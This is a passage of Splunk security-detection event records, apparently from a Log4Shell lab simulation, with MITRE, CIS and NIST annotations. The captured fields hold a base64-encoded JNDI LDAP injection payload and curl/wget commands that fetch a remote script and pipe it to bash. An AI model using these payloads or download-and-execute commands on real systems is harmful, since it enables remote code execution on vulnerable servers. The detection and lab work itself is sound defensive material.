13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="T1190", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642645151, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="T1190", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="Exploitation", annotations._all="CIS 3", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645151, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Execution", annotations._all="CVE-2021-44228", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="T1190", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="Exploitation", annotations._all="CIS 3", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", 